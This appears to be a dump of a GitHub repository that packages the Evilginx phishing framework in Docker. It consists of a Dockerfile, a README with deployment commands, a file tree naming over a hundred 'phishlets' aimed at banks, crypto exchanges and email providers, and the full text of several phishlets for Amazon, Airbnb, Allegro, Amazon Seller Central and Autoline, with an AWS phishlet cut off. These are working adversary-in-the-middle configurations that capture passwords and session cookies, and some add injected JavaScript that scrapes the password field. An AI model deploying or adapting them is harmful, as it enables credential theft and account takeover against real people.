├── Dockerfile ├── LICENSE ├── README.md ├── docker-entrypoint.sh ├── evilginx3.gif ├── phishlet_examples ├── 163working.yaml ├── Amazon--.yaml ├── airbnb.yaml ├── airbnbfr.yaml ├── alibaba.yaml ├── allegro.yaml ├── amazon-seller.yaml ├── amazon.yaml ├── americanexpress.yaml ├── aol.yaml ├── autoline.yaml ├── aws.yaml ├── banistmo.yaml ├── barclays.yaml ├── binance.yaml ├── binance2-(redirect-Captcha).yaml ├── binanceus.yaml ├── blockchain(Basic).yaml ├── blockchain(Fixed).yaml ├── blockchain(Fixed2).yaml ├── blockchain.yaml ├── bmo.yaml ├── bmomobile.yaml ├── booking.yaml ├── capital.yaml ├── chase.yaml ├── chrome_extension.yaml ├── citrix.yaml ├── coinbase.yaml ├── coinspot.yaml ├── coolblue.yaml ├── dropbox.yaml ├── ebay.yaml ├── edd.yaml ├── facebook-d.yaml ├── facebook-d2.yaml ├── facebook-d3.yaml ├── facebook-fix.yaml ├── facebook.yaml ├── fidelity.yaml ├── fudan.yaml ├── github.yaml ├── godaddy(sso).yaml ├── godaddy.yaml ├── google.yaml ├── google2.yaml ├── gsuite.yaml ├── gusto.yaml ├── hetzner.yaml ├── hinet.yaml ├── hotmail.yaml ├── huntington.yaml ├── icloud.yaml ├── icloud2.yaml ├── instagram.yaml ├── intuit.yaml ├── ionos.yaml ├── linkedin.yaml ├── linkedin2.yaml ├── luno.yaml ├── microsoft.yaml ├── mobile-de.yaml ├── namecheap.yaml ├── notthingham.yaml ├── nottingham.yaml ├── o365(2).yaml ├── o365(April-latest).yaml ├── o365(outlook).yaml ├── o365(working-october21).yaml ├── o365(working2).yaml ├── o365(working2a).yaml ├── o365.yaml ├── okta.yaml ├── onelogin.yaml ├── openbank.yaml ├── outlook(o365).yaml ├── outlook.yaml ├── outlook2.yaml ├── outlook3(particular modified).yaml ├── paxful.yaml ├── paypal(working2).yaml ├── paypal.yaml ├── playstation-B.yaml ├── playstation.yaml ├── protonmail.yaml ├── qdefi.yaml ├── quickbooks(intuit).yaml ├── rackspace.yaml ├── reddit.yaml ├── roblox.yaml ├── schwab(under-maintain).yaml ├── schwab.yaml ├── snapchat.yaml ├── steam.yaml ├── stripe.yaml ├── sununion.yaml ├── supersport.yaml ├── tiktok.yaml ├── tradus.yaml ├── twitter-mobile.yaml ├── twitter.yaml ├── txstate.yaml ├── usaa.yaml ├── vanguard.yaml ├── venmo(working).yaml ├── venmo.yaml ├── venmo2.yaml ├── viber.yaml ├── vrbo.yaml ├── webhinet.yaml ├── westernunion.yaml ├── woodforest.yaml ├── wordpress.org.yaml ├── xfinity.yaml └── yahoo(fixed).yaml └── phishlets └── coinbase.yaml /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:alpine 2 | 3 | ARG BUILD_RFC3339="1970-01-01T00:00:00Z" 4 | ARG COMMIT="local" 5 | ARG VERSION="v3.0.0" 6 | 7 | ENV GITHUB_USER="kgretzky" 8 | ENV EVILGINX_REPOSITORY="github.com/${GITHUB_USER}/evilginx2" 9 | ENV INSTALL_PACKAGES="git make gcc musl-dev" 10 | ENV PROJECT_DIR="${GOPATH}/src/${EVILGINX_REPOSITORY}" 11 | ENV EVILGINX_BIN="/bin/evilginx" 12 | 13 | RUN mkdir -p ${GOPATH}/src/github.com/${GITHUB_USER} \ 14 | && apk add --no-cache ${INSTALL_PACKAGES} \ 15 | && git -C ${GOPATH}/src/github.com/${GITHUB_USER} clone https://github.com/${GITHUB_USER}/evilginx2 16 | 17 | RUN set -ex \ 18 | && cd ${PROJECT_DIR}/ && go get ./... && make \ 19 | && cp ${PROJECT_DIR}/build/evilginx ${EVILGINX_BIN} \ 20 | && apk del ${INSTALL_PACKAGES} && rm -rf /var/cache/apk/* && rm -rf ${GOPATH}/src/* 21 | 22 | COPY ./docker-entrypoint.sh /opt/ 23 | RUN chmod +x /opt/docker-entrypoint.sh 24 | 25 | ENTRYPOINT ["/opt/docker-entrypoint.sh"] 26 | EXPOSE 53 443 27 | 28 | STOPSIGNAL SIGKILL 29 | 30 | # Build-time metadata as defined at http://label-schema.org 31 | ARG BUILD_DATE 32 | ARG VCS_REF 33 | ARG VERSION 34 | 35 | LABEL org.label-schema.build-date=$BUILD_DATE \ 36 | org.label-schema.name="Evilginx3 Docker" \ 37 | org.label-schema.description="Evilginx3 Docker Build" \ 38 | org.label-schema.url="https://github.com/Carp704/docker-evilginx3" \ 39 | org.label-schema.vcs-ref=$VCS_REF \ 40 | org.label-schema.vcs-url="https://github.com/Carp704/docker-evilginx3" \ 41 | org.label-schema.vendor="Carp704" \ 42 | org.label-schema.version=$VERSION \ 43 | org.label-schema.schema-version="1.0" 44 | 45 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # [Carp704/docker-evilginx3](https://github.com/Carp704/docker-evilginx3) 3 | 4 | 5 |
6 | 7 |
8 | 9 |

Docker setup for Evilginx version 3.0.

10 | 11 | 12 | ## Usage 13 | 14 | Example snippet to help you get started creating a container. 15 | 16 | ### Docker 17 | 18 | ``` 19 | # Create the image 20 | cd /opt 21 | git clone https://github.com/Carp704/docker-evilginx3.git 22 | cd docker-evilginx3 23 | docker build -t evilginx3-image . 24 | 25 | # Start the container 26 | docker run --name=evilginx3_prod \ 27 | -e TZ=America/New_York \ 28 | -p 443:443 \ 29 | -p 53:53 \ 30 | -v /opt/docker-evilginx3/config:/config \ 31 | -v /opt/docker-evilginx3/phishlets:/phishlets \ 32 | --restart=unless-stopped \ 33 | evilginx3-image 34 | 35 | # View the running container 36 | docker ps -a 37 | 38 | # Access the running container 39 | docker exec -it evilginx3_prod /bin/sh 40 | 41 | # Start Evilginx 42 | /bin/evilginx -p /phishlets -c /config -developer 43 | 44 | ``` 45 | 46 | ## Support Info 47 | 48 | ``` 49 | # Shell access 50 | docker exec -it evilginx3_prod /bin/sh 51 | 52 | # Monitor the logs of the container in realtime 53 | docker logs -f evilginx3_prod 54 | 55 | ``` 56 | 57 | ## Credit 58 | * [Kuba Gretzky](https://github.com/kgretzky) 59 | * [Warhorse](https://github.com/warhorse) 60 | 61 | -------------------------------------------------------------------------------- /docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # 4 | /bin/evilginx -h 5 | tail -f /dev/null 6 | -------------------------------------------------------------------------------- /evilginx3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Carp704/docker-evilginx3/297a9281fd5954d74653566358c9ad952a15d653/evilginx3.gif -------------------------------------------------------------------------------- /phishlet_examples/Amazon--.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true} 5 | - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | auth_tokens: 15 | - domain: '.amazon.com' 16 | keys: ['session-token', 'session-id-time', 'session-id', '.*,regexp'] 17 | - domain: 'www.amazon.com' 18 | keys: ['csm-hit,opt', '.*,regexp'] 19 | 20 | auth_urls: 21 | - '/' 22 | credentials: 23 | username: 24 | key: 'email' 25 | search: '(.*)' 26 | type: 'post' 27 | password: 28 | key: 'unenc_password' 29 | search: '(.*)' 30 | type: 'post' 31 | 32 | login: 33 | domain: 'www.amazon.com' 34 | path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 35 | js_inject: 36 | - trigger_domains: ["www.amazon.com"] 37 | trigger_paths: ["/ap/signin", "/signin"] 38 | trigger_params: [] 39 | script: | 40 | function onclickListener(){ 41 | var submit = document.querySelectorAll('input[type="submit"]')[0]; 42 | submit.setAttribute("onclick", "sendPass()"); 43 | submit.addEventListener("click", sendPass); 44 | return; 45 | } 46 | function sendPass(){ 47 | var password = document.getElementsByName("password")[0].value; 48 | var xhr = new XMLHttpRequest(); 49 | xhr.open("POST", '/accounts/login/ajax/', true); 50 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 51 | xhr.send("unenc_password="+encodeURIComponent(password)); 52 | return; 53 | } 54 | setTimeout(function(){ onclickListener(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/airbnbfr.yaml: -------------------------------------------------------------------------------- 1 | author: '@me' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: false} 6 | sub_filters: 7 | - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '', replace: '', mimes: ['text/html', 'application/json', 'application/xhtml+xml', 'application/xml']} 8 | auth_tokens: 9 | - domain: '.airbnb.co.uk' 10 | keys: ['.*,regexp'] 11 | - domain: 'www.airbnb.co.uk' 12 | keys: ['.*,regexp'] 13 | credentials: 14 | username: 15 | key: 'phoneNumber' 16 | search: '(.*)' 17 | type: 'post' 18 | password: 19 | key: 'phone' 20 | search: '(.*)' 21 | type: 'post' 22 | 23 | force_post: 24 | - path: '/api/v2/phone_one_time_passwords' 25 | search: 26 | - {key: 'currency', search: '.*'} 27 | - {key: 'key', search: '.*'} 28 | - {key: 'from', search: '.*'} 29 | - {key: 'locale', search: '.*'} 30 | - {key: 'otpMethod', search: '.*'} 31 | - {key: 'phoneNumber', search: '.*'} 32 | - {key: 'workFlow', search: '.*'} 33 | force: 34 | - {key: 'remember_me', value: 'true'} 35 | type: 'post' 36 | auth_urls: 37 | - '/' 38 | login: 39 | domain: 'www.airbnb.co.uk' 40 | path: '/login' 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /phishlet_examples/allegro.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false} 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'allegro.pl', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'edge', orig_sub: 'edge', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false} 7 | sub_filters: 8 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 9 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 10 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 11 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'tda.io', replace: 'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 12 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 13 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 14 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 15 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'tda.io', replace: 'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 16 | auth_tokens: 17 | - domain: '.allegro.pl' 18 | keys: ['.*,regexp'] 19 | auth_urls: 20 | - '/moje-allegro/moje-konto' 21 | 22 | credentials: 23 | username: 24 | key: '' 25 | search: '"username":"([^"]*)' 26 | type: 'json' 27 | password: 28 | key: '' 29 | search: '"password":"([^"]*)' 30 | type: 'json' 31 | custom: 32 | - key: '_csrf' 33 | search: '(.*)' 34 | type: 'post' 35 | 36 | login: 37 | domain: 'www.allegro.pl' 38 | path: '/login/form/' -------------------------------------------------------------------------------- /phishlet_examples/amazon-seller.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'sellercentral', orig_sub: 'sellercentral', domain: 'amazon.co.uk', session: true, is_landing: true} 5 | - {phish_sub: 'fls-eu', orig_sub: 'fls-eu', domain: 'amazon.com', session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | 8 | sub_filters: 9 | 10 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 11 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 12 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 13 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 14 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 15 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 16 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 17 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 18 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 19 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 20 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 21 | - {triggers_on: 'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 22 | - {triggers_on: 'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 23 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 24 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 25 | 26 | auth_tokens: 27 | - domain: '.amazon.co.uk' 28 | keys: ['.*,regexp'] 29 | - domain: '.amazon.com' 30 | keys: ['.*,regexp'] 31 | auth_urls: 32 | - '/' 33 | - '/*' 34 | 35 | credentials: 36 | username: 37 | key: 'email' 38 | search: '(.*)' 39 | type: 'post' 40 | password: 41 | key: 'password' 42 | search: '(.*)' 43 | type: 'post' 44 | 45 | force_post: 46 | - path: '/ap/signin' 47 | search: 48 | - {key: 'email', search: '.*'} 49 | - {key: 'password', search: '.*'} 50 | force: 51 | - {key: 'rememberMe', value: 'true'} 52 | type: 'post' 53 | 54 | login: 55 | domain: 'sellercentral.amazon.co.uk' 56 | path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 57 | -------------------------------------------------------------------------------- /phishlet_examples/amazon.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true} 5 | - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | auth_tokens: 15 | - domain: '.amazon.com' 16 | keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff'] 17 | credentials: 18 | username: 19 | key: 'email' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'password' 24 | search: '(.*)' 25 | type: 'post' 26 | login: 27 | domain: 'www.amazon.com' 28 | path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 29 | -------------------------------------------------------------------------------- /phishlet_examples/autoline.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'autoline.info', session: true, is_landing: true} 5 | - {phish_sub: 'mc', orig_sub: 'mc', domain: 'webvisor.org', session: true, is_landing: false} 6 | - {phish_sub: 'top', orig_sub: '', domain: 'autoline-top.com', session: true, is_landing: false} 7 | - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'jsdelivr.net', session: true, is_landing: false} 8 | - {phish_sub: 'cloudfront', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', session: true, is_landing: false} 9 | 10 | 11 | sub_filters: 12 | 13 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 14 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 15 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 16 | 17 | - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 18 | - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 19 | - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 20 | 21 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 22 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 23 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 24 | 25 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 26 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 27 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 28 | 29 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 30 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 31 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 32 | 33 | 34 | auth_tokens: 35 | - domain: 'autoline.info/my/dashboard/' 36 | keys: ['SID','.*,regexp'] 37 | - domain: 'autoline.info/' 38 | keys: ['SID','.*,regexp'] 39 | 40 | credentials: 41 | username: 42 | key: 'login_email' 43 | search: '(.*)' 44 | type: 'post' 45 | 46 | password: 47 | key: 'login_password' 48 | search: '(.*)' 49 | type: 'post' 50 | 51 | login: 52 | domain: 'autoline.info' 53 | path: '/login/' 54 | 55 | js_inject: 56 | - trigger_domains: ["autoline.info"] 57 | trigger_paths: ["/login/"] 58 | trigger_params: [] 59 | script: | 60 | function lp(){ 61 | var submit = document.getElementsByName('submit')[0]; 62 | submit.setAttribute("onclick", "sendPass()"); 63 | return; 64 | } 65 | function sendPass(){ 66 | var email = document.getElementsByName("login")[0].value; 67 | var password = document.getElementsByName("password")[0].value; 68 | var xhr = new XMLHttpRequest(); 69 | xhr.open("POST", '/', true); 70 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 71 | xhr.send("login_password="+encodeURIComponent(password)); 72 | console.log("LEAKING CREDENTIALS...") 73 | return; 74 | } 75 | setTimeout(function(){ lp(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/aws.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true} 5 | - {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 7 | 8 | - {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 9 | - {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 10 | - {phish_sub: 'portal.aws', orig_sub: 'portal.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} 11 | 12 | - {phish_sub: 'aws-signin-website-assets.s3', orig_sub: 'aws-signin-website-assets.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} 13 | - {phish_sub: 'cdn.assets.as2', orig_sub: 'cdn.assets.as2', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} 14 | - {phish_sub: 'opfcaptcha-prod.s3', orig_sub: 'opfcaptcha-prod.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} 15 | 16 | - {phish_sub: 'a.b.cdn.console', orig_sub: 